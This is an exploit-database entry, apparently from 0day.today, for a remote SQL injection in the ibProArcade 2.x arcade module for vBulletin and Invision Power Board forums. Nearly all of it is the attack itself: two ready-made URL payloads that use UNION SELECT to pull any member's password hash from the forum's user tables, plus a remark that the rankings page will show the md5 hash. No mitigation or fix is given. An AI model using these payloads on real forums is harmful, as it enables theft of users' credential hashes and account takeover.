ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit

2005-11-06T00:00:00
ID 1337DAY-ID-195
Type zdt
Reporter B~HFH
Modified 2005-11-06T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
===================================================================




# Rankings for (name) will state the md5 hash for the user /str0ke

# ibProArcade 2.x

IPB:

index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]




#  0day.today [2018-02-07]  #